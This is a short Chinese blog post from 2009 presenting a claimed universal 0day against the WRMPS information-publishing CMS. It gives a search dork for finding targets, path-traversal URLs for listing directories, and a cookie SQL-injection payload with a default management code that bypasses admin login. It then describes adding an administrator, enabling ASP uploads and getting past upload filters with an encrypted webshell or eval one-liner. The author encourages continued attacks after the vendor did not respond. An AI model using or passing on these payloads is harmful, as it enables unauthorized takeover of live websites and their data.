浏览模式: 标准 | 列表Tag:wrmps.oday

网人信息发布系统(WRMPS)通杀0day

Submitted by admin
2009, November 19, 9:23 AM

通杀,杀官方
搜:Powered By WRMPS
1.注册-列目录
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/admin
这个利用不大 ,密码只取MD5前十位,2B得很.
2.COOKIE欺骗进后台
admin/admin_main.asp or admin/admin_menu.asp 
admin=ManageCode=WRMPS6&admin=a' or '1'='1&pass=a' or '1'='1&flag=,&FlagGroup=0
有些后台不需要认证码ManageCode=默认WRMPS6,如果改了就只能猜了.
进了后台,添加管理员,添加上传类型ASP, 上传过滤了某些特殊代码,wscript.shell,execute之类的,直接传加密的马或者传eval的一句话就可以了.  联系了官方的人,没理我.努力日吧..
转自红狼骚总

Tags: wrmps.oday

漏洞集研 | 评论:0 | Trackbacks:0 | 阅读:12150